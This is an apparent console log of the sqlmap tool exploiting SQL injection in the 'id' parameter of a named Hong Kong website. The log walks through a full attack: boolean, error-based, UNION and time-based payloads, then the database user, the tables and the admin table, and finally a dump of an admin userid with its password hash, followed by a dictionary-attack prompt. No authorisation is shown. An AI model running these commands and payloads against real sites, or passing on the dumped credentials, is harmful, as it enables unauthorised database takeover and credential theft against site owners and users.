D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |